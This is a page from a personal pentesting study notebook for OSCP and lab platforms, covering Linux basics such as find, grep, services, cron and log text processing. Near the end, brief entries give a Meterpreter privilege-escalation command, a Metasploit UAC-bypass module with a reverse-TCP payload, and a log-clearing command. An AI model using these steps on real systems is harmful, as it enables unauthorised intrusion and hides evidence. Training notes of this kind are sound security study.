Pentesting Quick Reference OSCP and Beyond
  • Basic Tools & Techniques
  • Linux Basics
  • Windows Basics
  • Shells
  • Uploading Shells/ Transferring Files
  • FootPrinting
  • Host Discovery
  • Scanning
  • Vulnerability assessment
  • Metasploit and Meterpreter
    • Payloads
  • Brute Forcing/ Password Cracking
    • Attacking LSASS Passwords
    • Credentials Hunting Windows
    • Credential Hunting in Linux
    • Passwd, Shadow & Opasswd
    • Pass the Hash (PtH)
    • Protected Files
    • Protected Archives
    • Password Policies
    • Password Managers
    • Breached Credentials
    • Mimikatz
  • Linux Remote Management Protocols
  • Windows Remote Management Protocols
  • Port 20/21 - FTP Pentesting
  • Port 23 Telnet
  • Port 25 - SMTP
  • IMAP/ POP3
  • Port 53 DNS
  • Port 445 - SMB
  • Port 111 -RPC Bind
  • Port 135 - RPC
  • Port 137 NetBios
  • Port 161 SNMP
  • Port 1433 - MSSQL
  • Port 1521 Oracle TNS
  • Port 1833 - MQTT
  • Port 2049 - NFS
  • Port 3306 MySQL
  • Port 3389 - RDP
  • Port 5985 - Winrm
  • Port 632 (UDP) IPMI
  • Redis (6379)
  • Port 10000 Webmin
  • Privilege Escalation
    • Windows Priv esc
    • Linux Priv esc
  • Active Directory
    • AD Basics
      • AD Management Basics
    • Initial Enumeration of AD
      • Enumerating AD Users
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Password Spraying - Making a Target User List
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
      • Enumerating Security Controls
    • LLMNR Poisoning
    • SMB/ NTLM Relay Attacks
    • IPv6 Attacks
      • IPV6 DNS takeover
      • WPAD
    • Passback Attacks
    • AS-REP roasting
    • AD Shell
    • AD Enumeration
      • Credentialed Enumeration - from Linux
      • Credentialed Enumeration - from Windows
      • Living off the Land
      • BloodHound
      • Plumhound
      • Bloodhound CE
      • ldapdomaindump
      • PingCastle
    • Post Compromise
      • Kerberosting
        • Kerberos "Double Hop" Problem
      • Pass Attacks
        • Pass the Hash
        • Pass the Ticket
          • Pass the Ticket (PtT) from Windows
          • Pass the Ticket (PtT) from Linux
      • Token Impersonation
      • LNK File Attacks
      • Miscellaneous Misconfigurations
    • Access Control List (ACL) Abuse Primer
      • ACL Enumeration
      • ACL Abuse Tactics
      • DCSync
        • DCSync Example Forest HTB
    • Post Owning Domain
      • Attacking Active Directory & NTDS.dit 1
      • Golden Ticket Attacks
    • Privilege Escaltion
    • Bleeding Edge Vulnerabilities
    • Domain Trusts
      • Attacking Domain Trusts - Child -> Parent Trusts - from Windows
      • Attacking Domain Trusts - Child -> Parent Trusts - from Linux
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
      • Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    • Hardening Active Directory
    • Additional AD Auditing Techniques
    • HTB AD Enumeration & Attacks - Skills Assessment Part I
  • Web Pentesting
    • Subdomains, directories and Vhost listing
    • Command Injection
    • XSS
    • SQL Injection
    • Authentication Bypass
  • Cryptography
  • More Resources
  • Forensics
  • IoT Security
  • API Security
  • Binary Exploitation
    • Assembly Cheatsheat for Hackers
    • Malware Analysis
      • Basic Static Malware Analysis
  • Boxes/ Machines
    • Try Hack Me
      • Vulnversity
      • Basic Pentesting
      • Kenobi
      • Steel Mountain
    • Vulnhub
      • Tiki
    • HTB
      • Beep
      • Active
      • Forest
      • Devel
    • Metasploitable 2
    • PWN.COLLEGE Talking Web
    • PWN COLLGE Web Hacking
  • Private Challenges
    • Pwn
    • Forensics
  • Misc tools
    • NetExec
  • SOC Analyst Resources
  • OSCP Tips and Misc
  • Mobile Hacking
  • Buffer Overflow
  • Wordpress
  • Web3 and Blockchain Security
  • WIFI Hacking
    • WPS Hacking
    • Misc Tools
Powered by GitBook
On this page
  • Reference
  • Finding Files
  • Locate commad
  • ls with modified time
  • SSH key does not work
  • Check Sudo Permissions
  • Calculate Hash
  • Logs
  • Important commands
  • Start stop service
  • Background process
  • Important Files
  • cronjobs
  • Services
  • Access a shared folder
  • Escalate the privilege
  • Bypass Windows UAC
  • Clear logs
  • Cat alternative
  • Playing with text. Sorting, finding uniques values and cutting the values

Linux Basics

Essential Linux for Hackers.

PreviousBasic Tools & TechniquesNextWindows Basics

Last updated 1 year ago

Reference

  • /2/1

  • HACK THE BOX Academy Linux

Finding Files

find / -type f -name pass find -name *.txt 2>/dev/null
find . -writable 2>/dev/null// important to search for priv escallation
find / -perm -4000 *.txt -ls 2>/dev/null \\to view executable binaries
find / -name *.txt -ls 2>/dev/null  to list all text files in system

Locate commad

locate rockyou.txt
sudo updatedb  (essential to make a listing of directories/files)

ls with modified time

ls -t

Find files based on filename

find [directory path] -type f -name [filename]

find /home/Andy -type f -name sales.txt

Find Directory based on directory name

find [directory path] -type d -name [filename]

find /home/Andy -type d -name pictures

Find files based on size

find [directory path] -type f -size [size]

find /home/Andy -type f -size 10c

(c for bytes,

k for kilobytes

M megabytes

G for gigabytes

type:'man find' for full information on the options)

Find files based on username

find [directory path] -type f -user [username]

find /etc/server -type f -user john

Find files based on group name

find [directory path] -type f -group [group name]

find /etc/server -type f -group teamstar

Find files modified after a specific date

find [directory path] -type f -newermt '[date and time]'

find / -type f -newermt '6/30/2020 0:00:00'

(all dates/times after 6/30/2020 0:00:00 will be considered a condition to look for)

Find files based on date modified

find [directory path] -type f -newermt [start date range] ! -newermt [end date range]

find / -type f -newermt 2013-09-12 ! -newermt 2013-09-14

(all dates before 2013-09-12 will be excluded; all dates after 2013-09-14 will be excluded, therefore this only leaves 2013-09-13 as the date to look for.)

Find files based on date accessed

find [directory path] -type f -newerat [start date range] ! -newerat [end date range]

find / -type f -newerat 2017-09-12 ! -newerat 2017-09-14

(all dates before 2017-09-12 will be excluded; all dates after 2017-09-14 will be excluded, therefore this only leaves 2017-09-13 as the date to look for.)

Find files with a specific keyword

grep -iRl [directory path/keyword]

grep -iRl '/folderA/flag'

Ignore only these

grep -v "hello"

read the manual for the find command

man find

man find

check the history of bash

history

SSH key does not work

chmod 600 for SSH key to work

Check Sudo Permissions

sudo -l (tells which programs user can run as root)

Calculate Hash

Sha256sum filename (to compute the hash)

Logs

Linux logs are located in var/log

Important commands

whoami

Displays current username.

id

Returns users identity. Gives other groups the user is part of.

hostname

Sets or prints the name of current host system.

uname -a

Prints basic information about the operating system name and system hardware.

pwd

Returns working directory name.

ifconfig

The ifconfig utility is used to assign or to view an address to a network interface and/or configure network interface parameters.

ip

Ip is a utility to show or manipulate routing, network devices, interfaces and tunnels.

netstat

Shows network status.

ss

Another utility to investigate sockets.

ps

Shows process status.

ps aux

processes by all users

top

real time view of processes

who

Displays who is logged in.

env

Prints environment or sets and executes command.

lsblk

Lists block devices.

lsusb

Lists USB devices

lsof

Lists opened files.

lspci

Lists PCI devices.

wc -l access.log

show no of lines in a file

su

The su utility requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed. su - rocketchat

useradd

Creates a new user or update default new user information.

userdel

Deletes a user account and related files.

usermod

Modifies a user account.

addgroup

Adds a group to the system.

delgroup

Removes a group from the system.

passwd

Changes user password.

lsb_release -a

Current OS version

Start stop service

systemctl stop myservice

  • Start

  • Stop

  • Enable (add to system start up)

  • Disable

Background process

  • ctrl+z

  • add & at the end

  • fg processid

Important Files

File
Directory
Importance

shadow, passwd

/etc

passwords

sudoers

/etc

Sudo permissions

log,backup

/var

/tmp

writable in most of the cases

fail2ban.log, ufw.log,apache

/var/log

important logs

cronjobs

Crontab is one of the processes that is started during boot, which is responsible for facilitating and managing cron jobs.

A crontab is simply a special file with formatting that is recognised by the cron process to execute each line step-by-step. Crontabs require 6 specific values:

Value
Description

MIN

What minute to execute at

HOUR

What hour to execute at

DOM

What day of the month to execute at

MON

What month of the year to execute at

DOW

What day of the week to execute at

CMD

The actual command that will be executed.

crontab -l to see running crontabs

Services

Start a service

systemctl start ssh
systemctl status ssh

run a service after start up

systemctl enable ssh

Enumerate services

ps -aux
systemctl list-units --type=service

Access a shared folder

In Network tab press ctrl + L

smb://192.168.1.11

Escalate the privilege

get system
get system -t 1 for using named pipe

Bypass Windows UAC

background the session with ctrl+z

use exploit/windows/local/bypassuac_fodhelper
set SESSION 1
set paypload windows/meterpreter/reverse_tcp
run

Clear logs

clearenv

Cat alternative

if cat command does not work, try head, less, nano, vim. If not use grep

grep . hash.txt
grep -R . // displays all content of all files

Playing with text. Sorting, finding uniques values and cutting the values

# The first use of the cut command retrieves the column of the domain:port, and the second one removes the port by splitting it with a colon.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1
sway.com
sway.com
sway.office.com
--- REDACTED FOR BREVITY ---

# After retrieving the domains, the sort command arranges the list in alphabetical order

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
account.activedirectory.windowsazure.com
--- REDACTED FOR BREVITY ---

# Lastly, the uniq command removes all the duplicates

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq
account.activedirectory.windowsazure.com
activity.windows.com
admin.microsoft.com
--- REDACTED FOR BREVITY ---

We already have the list of unique domains based on our previous use case. Now, we only need to add some parameters to our commands to get the count of each domain accessed. This can be done by adding the -c option to the uniq command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c
    423 account.activedirectory.windowsazure.com
    184 activity.windows.com
    680 admin.microsoft.com
    272 admin.onedrive.com
    304 adminwebservice.microsoftonline.com

Moreover, the result can be sorted again based on the count of each domain by using the -n option of the sort command.

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -n
     78 partnerservices.getmicrosoftkey.com
    113 **REDACTED**
    118 ocsp.digicert.com
    123 officeclient.microsoft.com
--- REDACTED FOR BREVITY ---

Based on the result, you can see that the count of connections made for each domain is sorted in ascending order. If you want to make the output appear in descending order, use the -r option. Note that it can also be combined with the -n option (-nr if written together).

ubuntu@tryhackme:~/Desktop/artefacts$ cut -d ' ' -f3 access.log | cut -d ':' -f1 | sort | uniq -c | sort -nr
   4992 www.office.com
   4695 login.microsoftonline.com
   1860 www.globalsign.com
   1581 **REDACTED**
   1554 learn.microsoft.com
--- REDACTED FOR BREVITY --

crontab generator can be used to generate .Crontabs can be edited by using crontab -e, where you can select an editor (such as Nano) to edit your crontab.

https://tryhackme.com/room/linuxfundamentalspart3
https://tryhackme.com/room/linuxstrengthtraining
https://explainshell.com/
crontabs